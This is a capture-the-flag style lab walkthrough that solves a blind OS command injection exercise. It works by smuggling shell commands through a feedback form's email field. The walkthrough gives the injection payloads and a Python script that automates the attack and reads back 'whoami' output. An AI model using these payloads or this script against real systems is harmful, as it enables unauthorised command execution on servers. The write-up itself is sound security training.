3. Blind OS command injection with output redirection
Lets open the vulnerable lab:
Move around:
We have this post request and those parameters, lets test those parameters to see if we have blind command injection:
||sleep+5||
As we can see the email parameter is vulnerable, lets redirect whoami command to the directory mentioned in the objective above:
||whoami+>+/var/www/images/whoami.txt||
Lets go back to enumerate the website:
Lets try to open the images in a new tab:
As we can see maybe it fetches the photos from the directory we redirected the whoami command to, lets try:
As we can see we retrieved the output.
Solve it using a python3 script:
import requests
import os
import sys
import re
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080"
}
session = requests.session()
def CommandInjection():
print("[*] Get CSRF Token.")
csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "feedback").text)
print("[*] Perform Command Injection.")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"csrf={csrf[0]}&name=test&email=test@test.com||whoami+>+/var/www/images/whoami.txt||&subject=test&message=test"
session.post(url=url + "feedback/submit", headers=headers, data=data)
print(session.get(url=url + "image?filename=whoami.txt").text)
if __name__ == "__main__":
if len(sys.argv) != 2:
script_name = os.path.basename(__file__)
print(f"[-] Usage: python {script_name} http://localhost/")
sys.exit(1)
url = sys.argv[1]
CommandInjection()
print("[+] Solved.")
pLast updated